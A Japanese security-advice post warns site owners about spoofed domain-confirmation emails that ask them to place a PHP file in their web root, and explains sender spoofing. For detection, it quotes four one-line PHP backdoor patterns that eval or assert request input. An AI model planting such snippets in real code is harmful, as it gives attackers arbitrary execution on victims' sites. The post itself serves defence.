偽のドメイン確認メールを信用しないでください

English version: Do not trust those fake domain confirmation emails

最近、クライアントの何人かが、ドメイン レジストラから奇妙な電子メール レターを受け取りました。これらの手紙には、独自のドメインの確認の要求が含まれています。私はそれらの手紙の1つをチェックし、すぐにそれが詐欺的な手紙であることを確認しました.すべての文字は同一のパターンと、特定の名前と特定のコンテンツを持つ Web サイトのルート フォルダーに PHP ファイルを作成する要求を持っています。言うまでもなく、その PHP ファイルの提案されたコンテンツには、バックドア コードとして知られる悪意のあるコードが含まれています。この種のコードにより、攻撃者は被害者の Web サイトで任意のアクションを実行できます。

PHP コードの作成、ダウンロード、または Web サイトへのインストールを要求する手紙を受け取った場合は、無視してください。例外なく。社長やお母さんからの手紙でも構いません。

正規の差出人電子メール アドレスがあるため、不正な手紙は正規のように見えます。しかし、これはなりすましメールです。友達やドメイン レジストラーから偽のメールが届くとは思っていません。右？いいえ！電子メール レターには、送信者の電子メール アドレスを含めることができます。ほとんどの電子メール サーバーと電子メール クライアントは、送信者アドレスをチェックまたは検証しません。したがって、ハッカーが望んでいたと見なされます。既知の送信者から受け取った電子メール レターに、ウェブサイトへのコードのインストールやコンピューターへのアプリケーションのインストールなどの疑わしいアクションの要求が含まれている場合は、信頼してはなりません。

技術的な詳細

通常、偽の電子メールには、次の PHP 行の一部が含まれています。

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

参考までに: base64_decode、eval、および assert は、疑わしいまたは悪意のある PHP コードのよく知られたマーカーです。

参照: Plugin Inspector は、他のプラグインのセキュリティ問題を明らかにします